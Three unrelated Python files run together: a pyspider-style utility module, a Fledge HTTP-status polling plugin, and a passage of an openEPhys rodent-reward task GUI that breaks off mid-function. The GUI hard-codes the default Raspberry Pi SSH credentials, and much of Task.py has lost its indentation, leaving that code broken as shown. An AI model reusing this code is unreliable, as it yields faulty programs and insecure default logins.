    if not hasattr(signal, 'SIGALRM'):
        # e.g. Windows has no SIGALRM -> fall through to the no-op version below.
        raise ImportError('signal')

    class timeout:
        """
        Time limit of command

        with timeout(3):
            time.sleep(10)
        """

        def __init__(self, seconds=1, error_message='Timeout'):
            self.seconds = seconds
            self.error_message = error_message

        def handle_timeout(self, signum, frame):
            # SIGALRM handler: turn the alarm into our TimeoutError.
            raise TimeoutError(self.error_message)

        def __enter__(self):
            if not isinstance(threading.current_thread(), threading._MainThread):
                # signal.signal() may only be called from the main thread.
                logging.warning("timeout only works on main thread, are you running pyspider in threads?")
                self.seconds = 0  # disables the alarm entirely
            if self.seconds:
                signal.signal(signal.SIGALRM, self.handle_timeout)
                # alarm() only takes whole seconds, so round up.
                signal.alarm(int(math.ceil(self.seconds)))

        def __exit__(self, type, value, traceback):
            if self.seconds:
                signal.alarm(0)  # cancel any pending alarm
except ImportError as e:
    warnings.warn("timeout is not supported on your platform.", FutureWarning)

    class timeout:
        """
        Time limit of command (for windows)

        No-op fallback used when SIGALRM is unavailable.
        """

        def __init__(self, seconds=1, error_message='Timeout'):
            pass

        def __enter__(self):
            pass

        def __exit__(self, type, value, traceback):
            pass
def utf8(string):
    """
    Make sure string is utf8 encoded bytes.

    If parameter is a object, object.__str__ will been called before encode as bytes
    """
    if isinstance(string, six.binary_type):
        return string
    if isinstance(string, six.text_type):
        return string.encode('utf8')
    return six.text_type(string).encode('utf8')
def text(string, encoding='utf8'):
    """
    Make sure string is unicode type, decode with given encoding if it's not.

    If parameter is a object, object.__str__ will been called
    """
    if isinstance(string, six.binary_type):
        return string.decode(encoding)
    if isinstance(string, six.text_type):
        return string
    return six.text_type(string)
def pretty_unicode(string):
    """
    Make sure string is unicode, try to decode with utf8, or unicode escaped string if failed.
    """
    if isinstance(string, six.text_type):
        return string
    try:
        return string.decode("utf8")
    except UnicodeDecodeError:
        # Not valid UTF-8: render the raw bytes via unicode-escape instead.
        escaped = string.decode('Latin-1').encode('unicode_escape')
        return escaped.decode("utf8")
def unicode_string(string):
    """
    Make sure string is unicode, try to default with utf8, or base64 if failed.

    can been decode by `decode_unicode_string`
    """
    if isinstance(string, six.text_type):
        return string
    try:
        return string.decode("utf8")
    except UnicodeDecodeError:
        # BUG FIX: base64.b64encode() returns bytes on Python 3, so the old
        # str + bytes concatenation raised TypeError here. Decode first.
        return '[BASE64-DATA]' + base64.b64encode(string).decode('ascii') + '[/BASE64-DATA]'
def unicode_dict(_dict):
    """
    Make sure keys and values of dict is unicode.
    """
    return {unicode_obj(key): unicode_obj(value)
            for key, value in iteritems(_dict)}
def unicode_list(_list):
    """
    Make sure every element in list is unicode. bytes will encode in base64
    """
    return list(map(unicode_obj, _list))
def unicode_obj(obj):
    """
    Make sure keys and values of dict/list/tuple is unicode. bytes will encode in base64.

    Can been decode by `decode_unicode_obj`
    """
    if isinstance(obj, dict):
        return unicode_dict(obj)
    elif isinstance(obj, (list, tuple)):
        return unicode_list(obj)
    elif isinstance(obj, six.string_types):
        return unicode_string(obj)
    elif isinstance(obj, (int, float)):
        return obj
    elif obj is None:
        return obj
    else:
        # Best-effort fallbacks for arbitrary objects; exceptions narrowed
        # from bare 'except:' so KeyboardInterrupt/SystemExit propagate.
        try:
            return text(obj)
        except Exception:
            try:
                return '[BASE64-DATA]' + codecs.encode(obj, 'base64').decode() + '[/BASE64-DATA]'
            except Exception:
                return text(repr(obj))
def decode_unicode_string(string):
    """
    Decode string encoded by `unicode_string`

    Strings without the [BASE64-DATA]...[/BASE64-DATA] wrapper are returned untouched.
    """
    prefix = '[BASE64-DATA]'
    suffix = '[/BASE64-DATA]'
    if string.startswith(prefix) and string.endswith(suffix):
        return base64.b64decode(string[len(prefix):-len(suffix)])
    return string
def decode_unicode_obj(obj):
    """
    Decode unicoded dict/list/tuple encoded by `unicode_obj`
    """
    if isinstance(obj, dict):
        return {decode_unicode_string(key): decode_unicode_obj(value)
                for key, value in iteritems(obj)}
    if isinstance(obj, six.string_types):
        return decode_unicode_string(obj)
    if isinstance(obj, (list, tuple)):
        return [decode_unicode_obj(item) for item in obj]
    return obj
class Get(object):
    """
    Lazy value calculate for object

    Descriptor wrapping a zero-argument callable; the callable is invoked on
    every attribute access.
    """

    def __init__(self, getter):
        self.getter = getter

    def __get__(self, instance, owner):
        # instance/owner are ignored: the value depends only on the getter.
        return self.getter()
class ObjectDict(dict):
    """
    Object like dict, every dict[key] can visite by dict.key

    If dict[key] is `Get`, calculate it's value.

    NOTE(review): a missing key raises KeyError (not AttributeError) from
    attribute access, which breaks hasattr(); kept as-is for compatibility.
    """

    def __getattr__(self, name):
        value = self[name]
        if hasattr(value, '__get__'):
            # Descriptor-aware access (e.g. Get instances).
            return value.__get__(self, ObjectDict)
        return value
def load_object(name):
    """Load object from module"""
    if "." not in name:
        raise Exception('load object need module.object')
    mod_path, attr_name = name.rsplit('.', 1)
    if not six.PY2:
        module = __import__(mod_path, globals(), locals(), [attr_name])
    else:
        # Python 2 __import__ wants byte-string fromlist entries and level=-1.
        module = __import__(mod_path, globals(), locals(), [utf8(attr_name)], -1)
    return getattr(module, attr_name)
def get_python_console(namespace=None):
    """
    Return a interactive python console instance with caller's stack

    Prefers an IPython TerminalInteractiveShell when IPython is installed;
    otherwise falls back to stdlib code.InteractiveConsole (with readline
    tab-completion when available).
    """
    if namespace is None:
        import inspect
        frame = inspect.currentframe()
        caller = frame.f_back
        if not caller:
            logging.error("can't find caller who start this console.")
            caller = frame
        # Merge the caller's globals and locals so the console sees its scope.
        namespace = dict(caller.f_globals)
        namespace.update(caller.f_locals)

    try:
        from IPython.terminal.interactiveshell import TerminalInteractiveShell
        shell = TerminalInteractiveShell(user_ns=namespace)
    except ImportError:
        try:
            import readline
            import rlcompleter
            readline.set_completer(rlcompleter.Completer(namespace).complete)
            readline.parse_and_bind("tab: complete")
        except ImportError:
            pass
        import code
        shell = code.InteractiveConsole(namespace)
        shell._quit = False

        def exit():
            # Flag checked by readfunc below to end the session via EOFError.
            shell._quit = True

        def readfunc(prompt=""):
            if shell._quit:
                raise EOFError
            return six.moves.input(prompt)

        # inject exit method
        shell.ask_exit = exit
        shell.raw_input = readfunc

    return shell
def python_console(namespace=None):
    """Start a interactive python console with caller's stack"""
    if namespace is None:
        import inspect
        current = inspect.currentframe()
        parent = current.f_back
        if not parent:
            logging.error("can't find caller who start this console.")
            parent = current
        # Caller's globals overlaid with its locals.
        namespace = dict(parent.f_globals)
        namespace.update(parent.f_locals)
    return get_python_console(namespace=namespace).interact()
def check_port_open(port, addr='127.0.0.1'):
    """Return True when a TCP connection to (addr, port) succeeds, else False."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect_ex returns 0 on success instead of raising.
        return sock.connect_ex((addr, port)) == 0
    finally:
        # BUG FIX: the socket used to leak on every call.
        sock.close()
def pickle_loads(data):
    """Inverse of pickle_dumps: base64 text -> original object.

    NOTE(security): pickle.loads must never be fed untrusted input.
    """
    raw = codecs.decode(data.encode(), 'base64')
    return pickle.loads(raw)
def pickle_dumps(data):
    """Pickle *data* and return it as base64-encoded text (see pickle_loads)."""
    pickled = pickle.dumps(data)
    return codecs.encode(pickled, 'base64').decode()
def get_project_name(obj):
    """Return the top-level package name of the module that defines *obj*."""
    defining_module = sys.modules[obj.__module__]
    return defining_module.__name__.split('.', 1)[0]
|
http-status.py | # -*- coding: utf-8 -*-
# FLEDGE_BEGIN
# See: http://fledge-iot.readthedocs.io/
# FLEDGE_END
""" Weather report from OpenWeatherMap async plugin """
import copy
import asyncio
import json
import logging
from threading import Thread
from aiohttp import web
from fledge.common import logger
from fledge.plugins.common import utils
import async_ingest
import pycurl
__author__ = "Mark Riddoch, Ashwin Gopalakrishnan, Amarendra K Sinha"
__copyright__ = "Copyright (c) 2018 Dianomic Systems"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
# Default Fledge configuration category for this south plugin.
_DEFAULT_CONFIG = {
    'plugin': {  # fixed plugin name; not user-editable
        'description': 'HTTP Status check',
        'type': 'string',
        'default': 'http-status',
        'readonly': 'true'
    },
    'url': {  # endpoint polled by WeatherReport.fetch()
        'description': 'API URL to fetch information',
        'type': 'string',
        'default': 'https://www.univie.ac.at/',
        'order': '1',
        'displayName': 'API URL',
        'mandatory': 'true'
    },
    'assetName': {  # asset name attached to every ingested reading
        'description': 'Asset Name',
        'type': 'string',
        'default': 'http-status',
        'order': '2',
        'displayName': 'Asset Name',
        'mandatory': 'true'
    },
    'rate': {  # polling interval, seconds
        'description': 'Rate at which to send requests in seconds',
        'type': 'integer',
        'default': '10',
        'minimum': '1',
        'order': '3',
        'displayName': 'Request Interval'
    },
    'pkiFile': {  # optional client certificate for mutual TLS
        'description': 'Path to the p12 certificate file. (OPTIONAL)',
        'type': 'string',
        'order': '4',
        'default': '',
        'displayName': 'Certificate P12 file'
    },
    'pkiPasswd': {
        'description': 'Password for the certificate (OPTIONAL)',
        'type': 'string',
        'default': '',
        'order': '5',
        'displayName': 'Cert Password'
    }
}
_LOGGER = logger.setup(__name__, level=logging.DEBUG)

# Module-level plugin state, populated by plugin_start / plugin_register_ingest:
c_callback = None    # C opaque callback handle for async_ingest
c_ingest_ref = None  # C opaque ingest reference for async_ingest
loop = None          # dedicated asyncio event loop driving the polling task
t = None             # thread running that loop's run_forever()
task = None          # WeatherReport instance doing the actual fetching
def plugin_info():
    """ Returns information about the plugin.

    Args:
    Returns:
        dict: plugin information
    Raises:
    """
    info = dict(
        name='HTTP Status',
        version='1.9.1',
        mode='async',
        type='south',
        interface='1.0',
        config=_DEFAULT_CONFIG,
    )
    return info
def plugin_init(config):
    """ Initialise the plugin: the handle is a deep copy of the configuration.

    Args:
        config: JSON configuration document for the South plugin configuration category
    Returns:
        data: JSON object to be used in future calls to the plugin
    Raises:
    """
    handle = copy.deepcopy(config)
    return handle
def plugin_start(handle):
    """Start the plugin: build the polling task and run its event loop in a thread.

    Args:
        handle: config dict returned by plugin_init (category item values)
    Raises:
        re-raises anything that prevents startup, after logging it.
    """
    global loop, t, task
    loop = asyncio.new_event_loop()
    try:
        url = handle['url']['value']
        rate = handle['rate']['value']
        asset_name = handle['assetName']['value']
        cert_file = handle['pkiFile']['value']
        cert_pwd = handle['pkiPasswd']['value']
        task = WeatherReport(url, rate, asset_name, cert_file, cert_pwd)
        task.start()

        def run():
            global loop
            loop.run_forever()

        t = Thread(target=run)
        t.start()
    except Exception as e:
        # BUG FIX: the message used to blame "OpenWeatherMap" — a leftover from
        # the plugin this code was derived from; this is the http-status plugin.
        _LOGGER.exception("http-status plugin failed to start. Details %s", str(e))
        raise
def plugin_reconfigure(handle, new_config):
    """ Reconfigures the plugin

    it should be called when the configuration of the plugin is changed during the operation of the south service.
    The new configuration category should be passed.

    Args:
        handle: handle returned by the plugin initialisation call
        new_config: JSON object representing the new configuration category for the category
    Returns:
        new_handle: new handle to be used in the future calls
    Raises:
    """
    # BUG FIX: log message used to say "OpenWeatherMap" — wrong plugin name.
    _LOGGER.info("Old config for http-status plugin {} \n new config {}".format(handle, new_config))
    # Full restart cycle: stop, re-init with the new category, start again.
    plugin_shutdown(handle)
    new_handle = plugin_init(new_config)
    plugin_start(new_handle)
    return new_handle
def plugin_shutdown(handle):
    """Stop the polling task and its event loop; re-raises on failure.

    NOTE(review): loop.stop() is invoked from outside the loop's thread here;
    loop.call_soon_threadsafe(loop.stop) would be the documented-safe form —
    confirm before changing. The loop thread `t` is also never join()ed.
    """
    try:
        _LOGGER.info('South http-status plugin shutting down.')
        task.stop()
        loop.stop()
    except Exception as e:
        _LOGGER.exception(str(e))
        raise
def plugin_register_ingest(handle, callback, ingest_ref):
    """Required plugin interface component to communicate to South C server

    Args:
        handle: handle returned by the plugin initialisation call
        callback: C opaque object required to passed back to C->ingest method
        ingest_ref: C opaque object required to passed back to C->ingest method
    """
    global c_callback, c_ingest_ref
    c_callback, c_ingest_ref = callback, ingest_ref
    _LOGGER.debug(f': register ingest: {callback}, {ingest_ref}')
class WeatherReport(object):
    """ Periodically fetch self.url with pycurl and ingest status/timing readings.

    (Class name kept from the OpenWeatherMap plugin this code was derived from.)
    """
    __slots__ = ['_interval', 'url', 'asset_name', '_handler', 'cert_file', 'cert_pwd']

    def __init__(self, url, rate, asset_name, cert_file, cert_pwd):
        self._interval = float(rate)  # seconds between requests
        self.url = url
        self.asset_name = asset_name
        self.cert_file = cert_file    # optional P12 client certificate path
        self.cert_pwd = cert_pwd      # optional certificate password
        self._handler = None          # TimerHandle for the next scheduled run
        _LOGGER.debug(": init----")

    def _run(self):
        """Fetch once, then reschedule self on the module-level loop."""
        _LOGGER.debug(f'run {self.url}')
        self.fetch()
        _LOGGER.debug('run fetch end')
        self._handler = loop.call_later(self._interval, self._run)

    def start(self):
        """Schedule the first fetch one interval from now."""
        _LOGGER.debug('start')
        self._handler = loop.call_later(self._interval, self._run)

    def stop(self):
        """Cancel the pending scheduled fetch."""
        self._handler.cancel()

    def fetch(self):
        """Request self.url and ingest one {status, time, error, url} reading."""
        try:
            err = ''
            c = pycurl.Curl()
            try:
                c.setopt(c.URL, self.url)
                if self.cert_file and self.cert_pwd:
                    # Optional mutual TLS via the configured P12 client certificate.
                    c.setopt(pycurl.SSLCERTTYPE, 'P12')
                    c.setopt(pycurl.KEYPASSWD, self.cert_pwd)
                    c.setopt(pycurl.SSLCERT, self.cert_file)
                c.perform()
            except Exception as ex:
                status = 999  # sentinel: request failed before an HTTP status existed
                time = 0
                err = str(ex)
            else:
                status = c.getinfo(c.HTTP_CODE)
                time = c.getinfo(c.TOTAL_TIME)
                err = ""
            finally:
                # BUG FIX: the Curl handle used to leak on every fetch.
                c.close()
            data = {
                'asset': self.asset_name,
                'timestamp': utils.local_timestamp(),
                'readings': [{'status': status,
                              'time': time,
                              'error': err,
                              'url': self.url}]
            }
            _LOGGER.debug(f'status: ----{data}')
            async_ingest.ingest_callback(c_callback, c_ingest_ref, data)
            _LOGGER.debug(f'status: ----{status}')
        except Exception as ex:
            err = "Unable to fetch information from api.openweathermap: {}".format(str(ex))
            _LOGGER.error(err)
|
Task.py | # This is a task
import numpy as np
from threading import Lock, Thread
from openEPhys_DACQ.RPiInterface import RewardControl
from time import time, sleep
from scipy.spatial.distance import euclidean
import random
from PyQt5 import QtWidgets, QtGui
import warnings
from copy import copy, deepcopy
from openEPhys_DACQ.audioSignalGenerator import createAudioSignal
from openEPhys_DACQ.sshScripts import ssh
from openEPhys_DACQ.HelperFunctions import show_message
import contextlib
with contextlib.redirect_stdout(None):
import pygame
def init_pygame():
    """Initialise pygame with the mixer pre-configured for 48 kHz stereo playback."""
    pygame.mixer.pre_init(48000, -16, 2)  # This is necessary for sound to work
    pygame.init()
def close_pygame():
    """Shut down the pygame mixer and pygame itself (inverse of init_pygame)."""
    pygame.mixer.quit()
    pygame.quit()
def activate_feeder(feeder_type, RPiIPBox, RPiUsernameBox, RPiPasswordBox, quantityBox):
    """Open an SSH session to the feeder's Raspberry Pi and trigger one reward.

    feeder_type - 'milk' (quantity = valve-open time, float) or
                  'pellet' (quantity = pellet count, int); anything else raises.
    The remaining arguments are Qt line-edit widgets read via .text().
    """
    # Validate the feeder type and parse the quantity BEFORE connecting:
    # previously an unknown type (or a bad quantity) raised after the SSH
    # connection was opened, leaving it dangling without disconnect().
    if feeder_type == 'milk':
        command = 'python milkFeederController.py --openValve ' + str(float(str(quantityBox.text())))
    elif feeder_type == 'pellet':
        command = 'python pelletFeederController.py --releasePellet ' + str(int(str(quantityBox.text())))
    else:
        raise Exception('Unknown feeder_type {}'.format(feeder_type))
    ssh_connection = ssh(str(RPiIPBox.text()), str(RPiUsernameBox.text()), str(RPiPasswordBox.text()))
    ssh_connection.sendCommand(command)
    ssh_connection.disconnect()
def set_double_h_box_stretch(hbox):
    """Give the first widget in *hbox* stretch 2 and the second stretch 1; return hbox."""
    for position, factor in enumerate((2, 1)):
        hbox.setStretch(position, factor)
    return hbox
def set_triple_h_box_stretch(hbox):
    """Give three widgets in *hbox* stretches 3, 1, 1; return hbox."""
    for position, factor in enumerate((3, 1, 1)):
        hbox.setStretch(position, factor)
    return hbox
def set_quadruple_h_box_stretch(hbox):
    """Give four widgets in *hbox* stretches 2, 1, 1, 1; return hbox."""
    for position, factor in enumerate((2, 1, 1, 1)):
        hbox.setStretch(position, factor)
    return hbox
def play_audio_signal(frequency, frequency_band_width, modulation_frequency, duration=2):
    """Play *duration* seconds of a generated audio signal, then tear pygame down.

    Each of the three signal parameters may be passed either as a number or as
    a QLineEdit widget, in which case its text is parsed into np.int64.
    NOTE(review): uses type(x) == QLineEdit, so subclasses of QLineEdit would
    not be parsed — confirm before changing to isinstance().
    """
    if type(frequency) == QtWidgets.QLineEdit:
        frequency = np.int64(float(str(frequency.text())))
    if type(frequency_band_width) == QtWidgets.QLineEdit:
        frequency_band_width = np.int64(float(str(frequency_band_width.text())))
    if type(modulation_frequency) == QtWidgets.QLineEdit:
        modulation_frequency = np.int64(float(str(modulation_frequency.text())))
    # Initialize pygame for playing sound
    init_pygame()
    # Get sound
    sound = createAudioSignal(frequency, frequency_band_width, modulation_frequency)
    # Play duration seconds of the sound
    sound.play(-1, maxtime=(duration * 1000))
    sleep(duration)  # block until playback time has elapsed
    close_pygame()
def distance_from_segment(point, seg_p1, seg_p2):
    """
    Computes distance of numpy array point from a segment defined by two numpy array points
    seg_p1 and seg_p2.

    NOTE(review): this is the SIGNED perpendicular distance to the infinite
    line through the two points (sign given by the 2D cross product), not the
    true point-to-segment distance — confirm callers rely on that.
    """
    segment_vec = seg_p2 - seg_p1
    to_point = point - seg_p1
    return np.cross(segment_vec, to_point) / np.linalg.norm(segment_vec)
def distance_from_boundaries(point, arena_size):
    """Return the smallest signed distance from *point* to the four arena walls.

    Walls run clockwise (north, east, south, west); for a point inside the
    arena every wall distance is positive, so the minimum is the distance to
    the nearest wall.
    """
    width = float(arena_size[0])
    height = float(arena_size[1])
    # Arena corners in clockwise order; consecutive (wrapping) pairs form the walls.
    corners = [np.array([0.0, 0.0]), np.array([width, 0.0]),
               np.array([width, height]), np.array([0.0, height])]
    wall_distances = []
    for i in range(4):
        p1 = corners[i]
        p2 = corners[(i + 1) % 4]
        # Signed perpendicular distance to the wall line (same math as
        # distance_from_segment, inlined here).
        wall_distances.append(np.cross(p2 - p1, point - p1) / np.linalg.norm(p2 - p1))
    return min(wall_distances)
class SettingsGUI(object):
def __init__(self, main_settings_layout, further_settings_layout, arena_size):
"""
main_settings_layout - QtWidgets VBox Layout
further_settings_layout - QtWidgets HBox Layout
arena_size - list or numpy array of x and y size of the arena
"""
# Create empty settings variables
self.arena_size = arena_size
self.settings = {'FEEDERs': {'pellet': [], 'milk': []}}
# Create GUI size requirements
self.min_size = [0, 0]
# Create empty button groups dictionary
self.button_groups = {}
# Create settings menu
self.populate_main_settings_layout(main_settings_layout)
self.populate_further_settings_layout(further_settings_layout)
def make_space_for_frame(self, frame):
self.min_size[0] = self.min_size[0] + frame.minimumWidth()
self.min_size[1] = max(self.min_size[1], frame.minimumHeight())
def populate_main_settings_layout(self, main_settings_layout):
vbox = QtWidgets.QVBoxLayout()
font = QtGui.QFont('SansSerif', 15)
string = QtWidgets.QLabel('General Settings')
string.setFont(font)
string.setMaximumHeight(40)
vbox.addWidget(string)
# Specify which game is active Pellet, Milk or both
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Games active'))
self.settings['games_active'] = {'pellet': QtWidgets.QCheckBox('Pellet'),
'milk': QtWidgets.QCheckBox('Milk')}
self.settings['games_active']['pellet'].setChecked(True)
self.settings['games_active']['milk'].setChecked(True)
hbox.addWidget(self.settings['games_active']['pellet'])
hbox.addWidget(self.settings['games_active']['milk'])
vbox.addLayout(set_triple_h_box_stretch(hbox))
# Add option to specify how far into past to check travel distance
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Last travel time (s)'))
self.settings['LastTravelTime'] = QtWidgets.QLineEdit('2')
hbox.addWidget(self.settings['LastTravelTime'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Add smoothing factor for calculating last travel distance
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Last travel smoothing (dp)'))
self.settings['LastTravelSmooth'] = QtWidgets.QLineEdit('3')
hbox.addWidget(self.settings['LastTravelSmooth'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Add minimum distance for last travel
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Last travel min distance (cm)'))
self.settings['LastTravelDist'] = QtWidgets.QLineEdit('50')
hbox.addWidget(self.settings['LastTravelDist'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Specify pellet vs milk reward ratio
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Pellet vs Milk Reward ratio'))
self.settings['PelletMilkRatio'] = QtWidgets.QLineEdit('0.25')
hbox.addWidget(self.settings['PelletMilkRatio'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Specify raspberry pi username
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Raspberry Pi usernames'))
self.settings['Username'] = QtWidgets.QLineEdit('pi')
hbox.addWidget(self.settings['Username'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Specify raspberry pi password
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Raspberry Pi passwords'))
self.settings['Password'] = QtWidgets.QLineEdit('raspberry')
hbox.addWidget(self.settings['Password'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Put these settings into a frame
frame = QtWidgets.QFrame()
frame.setLayout(vbox)
frame.setFrameStyle(3)
# Set minimum size for frame
frame.setFixedSize(300, 300)
# Put frame into main settings layout
main_settings_layout.addWidget(frame)
self.make_space_for_frame(frame)
def populate_further_settings_layout(self, further_settings_layout):
    """Build the pellet and milk task settings frames and add both to the layout."""
    # Build each frame in turn so widget-creation order matches GUI order.
    for build_frame in (self.create_pellet_task_settings, self.create_milk_task_settings):
        frame = build_frame()
        further_settings_layout.addWidget(frame)
        self.make_space_for_frame(frame)
def create_pellet_task_settings(self):
    """Build and return a framed widget holding all Pellet task settings.

    Each editable field is stored in self.settings under its settings key so
    that export_settings_from_gui() can later read the values back. Also
    creates the scrollable pellet FEEDER list and its 'Add FEEDER' button.

    Returns:
        QtWidgets.QFrame containing the assembled layout (min size 400x900).
    """
    # Create Pellet task specific menu items
    vbox = QtWidgets.QVBoxLayout()
    font = QtGui.QFont('SansSerif', 15)
    string = QtWidgets.QLabel('Pellet Game Settings')
    string.setFont(font)
    vbox.addWidget(string)
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Initial Pellets'))
    self.settings['InitPellets'] = QtWidgets.QLineEdit('5')
    hbox.addWidget(self.settings['InitPellets'])
    vbox.addLayout(set_double_h_box_stretch(hbox))
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Reward Quantity'))
    self.settings['PelletQuantity'] = QtWidgets.QLineEdit('1')
    hbox.addWidget(self.settings['PelletQuantity'])
    vbox.addLayout(set_double_h_box_stretch(hbox))
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Min Separation (s)'))
    self.settings['PelletRewardMinSeparationMean'] = QtWidgets.QLineEdit('10')
    hbox.addWidget(self.settings['PelletRewardMinSeparationMean'])
    vbox.addLayout(set_double_h_box_stretch(hbox))
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Min Separation variance (%)'))
    self.settings['PelletRewardMinSeparationVariance'] = QtWidgets.QLineEdit('0.5')
    hbox.addWidget(self.settings['PelletRewardMinSeparationVariance'])
    vbox.addLayout(set_double_h_box_stretch(hbox))
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Chewing Target count'))
    self.settings['Chewing_Target'] = QtWidgets.QLineEdit('4')
    hbox.addWidget(self.settings['Chewing_Target'])
    vbox.addLayout(set_double_h_box_stretch(hbox))
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Inactivity pellet time (s)'))
    self.settings['MaxInactivityDuration'] = QtWidgets.QLineEdit('90')
    hbox.addWidget(self.settings['MaxInactivityDuration'])
    vbox.addLayout(set_double_h_box_stretch(hbox))
    # Specify chewing signal TTL channel
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Chewing TTL channel'))
    self.settings['Chewing_TTLchan'] = QtWidgets.QLineEdit('5')
    hbox.addWidget(self.settings['Chewing_TTLchan'])
    vbox.addLayout(set_double_h_box_stretch(hbox))
    # Create Pellet FEEDER items
    scroll_widget = QtWidgets.QWidget()
    self.pellet_feeder_settings_layout = QtWidgets.QVBoxLayout(scroll_widget)
    self.addPelletFeederButton = QtWidgets.QPushButton('Add FEEDER')
    self.addPelletFeederButton.clicked.connect(lambda: self.addFeedersToList('pellet'))
    self.pellet_feeder_settings_layout.addWidget(self.addPelletFeederButton)
    scroll = QtWidgets.QScrollArea()
    scroll.setWidget(scroll_widget)
    scroll.setWidgetResizable(True)
    vbox.addWidget(scroll)
    # Add Pellet Task settings to task specific settings layout
    frame = QtWidgets.QFrame()
    frame.setLayout(vbox)
    frame.setFrameStyle(3)
    # Set minimum size for frame
    frame.setMinimumSize(400, 900)
    return frame
def create_milk_task_settings(self):
    """Build and return a framed widget holding all Milk task settings.

    Fields are laid out in a two-column grid; every editable widget is
    stored in self.settings (QLineEdit, QRadioButton or QCheckBox) so that
    export_settings_from_gui() can read the values back. Radio buttons are
    grouped in self.button_groups so only one per group can be checked.
    Also creates the scrollable milk FEEDER list and its 'Add FEEDER' button.

    Returns:
        QtWidgets.QFrame containing the assembled layout (min size 800x800).
    """
    vbox = QtWidgets.QVBoxLayout()
    # Create Milk task label
    font = QtGui.QFont('SansSerif', 15)
    string = QtWidgets.QLabel('Milk Game Settings')
    string.setFont(font)
    vbox.addWidget(string)
    # Create top grid layout
    grid = QtWidgets.QGridLayout()
    vbox.addLayout(grid)
    # Add initiation milk amount
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Initial Milk'))
    self.settings['InitMilk'] = QtWidgets.QLineEdit('2')
    hbox.addWidget(self.settings['InitMilk'])
    grid.addLayout(set_double_h_box_stretch(hbox), 0, 0)
    # Specify audio signal mode
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Audio Signal Mode'))
    self.settings['AudioSignalMode'] = {'ambient': QtWidgets.QRadioButton('Ambient'),
                                        'localised': QtWidgets.QRadioButton('Localised')}
    self.settings['AudioSignalMode']['ambient'].setChecked(True)
    hbox.addWidget(self.settings['AudioSignalMode']['ambient'])
    hbox.addWidget(self.settings['AudioSignalMode']['localised'])
    self.button_groups['AudioSignalMode'] = QtWidgets.QButtonGroup()
    self.button_groups['AudioSignalMode'].addButton(self.settings['AudioSignalMode']['ambient'])
    self.button_groups['AudioSignalMode'].addButton(self.settings['AudioSignalMode']['localised'])
    grid.addLayout(set_triple_h_box_stretch(hbox), 1, 0)
    # Add Milk reward quantity
    self.settings['MilkQuantity'] = {}
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Reward Quantity'))
    sub_hbox = QtWidgets.QHBoxLayout()
    sub_hbox.addWidget(QtWidgets.QLabel('present'))
    self.settings['MilkQuantity']['presentation'] = QtWidgets.QLineEdit('1')
    sub_hbox.addWidget(self.settings['MilkQuantity']['presentation'])
    hbox.addLayout(set_double_h_box_stretch(sub_hbox))
    sub_hbox = QtWidgets.QHBoxLayout()
    sub_hbox.addWidget(QtWidgets.QLabel('repeat'))
    self.settings['MilkQuantity']['repeat'] = QtWidgets.QLineEdit('1')
    sub_hbox.addWidget(self.settings['MilkQuantity']['repeat'])
    hbox.addLayout(set_double_h_box_stretch(sub_hbox))
    grid.addLayout(set_triple_h_box_stretch(hbox), 2, 0)
    # Specify light signal pins to use, separated by comma
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Light Signal Pin(s)'))
    self.settings['lightSignalPins'] = QtWidgets.QLineEdit('1')
    hbox.addWidget(self.settings['lightSignalPins'])
    grid.addLayout(set_double_h_box_stretch(hbox), 3, 0)
    # Specify light signal settings regarding repeating trials
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Light Signal On'))
    self.settings['LightSignalOnRepetitions'] = {'presentation': QtWidgets.QCheckBox('present'),
                                                 'repeat': QtWidgets.QCheckBox('repeat')}
    self.settings['LightSignalOnRepetitions']['presentation'].setChecked(True)
    hbox.addWidget(self.settings['LightSignalOnRepetitions']['presentation'])
    hbox.addWidget(self.settings['LightSignalOnRepetitions']['repeat'])
    grid.addLayout(set_triple_h_box_stretch(hbox), 4, 0)
    # Specify probability that light signal does turn on
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Light Signal probability (0 - 1)'))
    self.settings['lightSignalProbability'] = QtWidgets.QLineEdit('1')
    hbox.addWidget(self.settings['lightSignalProbability'])
    grid.addLayout(set_double_h_box_stretch(hbox), 5, 0)
    # Specify light signal intensity
    hbox = QtWidgets.QHBoxLayout()
    hbox.addWidget(QtWidgets.QLabel('Light Signal intensity (0 - 100)'))
    self.settings['lightSignalIntensity'] = QtWidgets.QLineEdit('100')
    hbox.addWidget(self.settings['lightSignalIntensity'])
    grid.addLayout(set_double_h_box_stretch(hbox), 6, 0)
    # Specify light signal delay relative to trial start
    hbox = QtWidgets.QHBoxLayout()
